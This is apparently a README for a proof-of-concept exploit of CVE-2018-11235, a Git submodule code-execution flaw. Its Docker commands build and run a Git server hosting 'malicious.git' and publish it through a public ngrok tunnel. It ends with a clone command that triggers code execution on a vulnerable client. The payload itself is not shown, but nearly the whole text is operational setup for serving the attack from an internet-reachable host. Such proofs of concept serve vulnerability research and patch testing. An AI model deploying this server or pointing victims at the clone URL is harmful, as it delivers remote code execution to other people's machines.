CVE-2018-11235-Git-Submodule-CE + Docker Ngrok Configuration

CVE-2018-11235-Git PoC and tunneling with docker ngrok

Build Dockerfile

$ docker build -t cve-2018-11235 .

Create custom network for ngrok

$ docker network create myngroknet

Start Git Http Server

$ docker run -d -p 8080:80 --net myngroknet --name cve-2018-11235 cve-2018-11235

Start Ngrok HTTP Server for Git Server

$ docker run -d -p 4040:4040 --net myngroknet --name ngrok wernight/ngrok ngrok http cve-2018-11235:80 --authtoken PUT_YOUR_NGROK_AUTHTOKEN

You can now access the API to find the assigned domain:

$ curl $(docker port www_ngrok 4040)/api/tunnels
{"tunnels":[{"name":"command_line","uri":"/api/tunnels/command_line","public_url":"https://f5fc-116-206-35-27.ngrok.io","proto":"https","config":{"addr":"http://cve-2018-11235:80","inspect":true},"metrics":{"conns":{"count":0,"gauge":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0},"http":{"count":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0}}},{"name":"command_line (http)","uri":"/api/tunnels/command_line%20%28http%29","public_url":"http://f5fc-116-206-35-27.ngrok.io","proto":"http","config":{"addr":"http://cve-2018-11235:80","inspect":true},"metrics":{"conns":{"count":0,"gauge":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0},"http":{"count":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0}}}],"uri":"/api/tunnels"}

PoC on Vulnerable Git Server

$ git clone --recurse-submodules http://f5fc-116-206-35-27.ngrok.io/malicious.git

References:

• CVE-2018-11235 git RCE
• CVE-2018-11235-Git-Submodule-CE
• Expose Docker Container services on the Internet using the ngrok docker image
• wernight/ngrok
• CVE-2018-11235 - Quick & Dirty PoC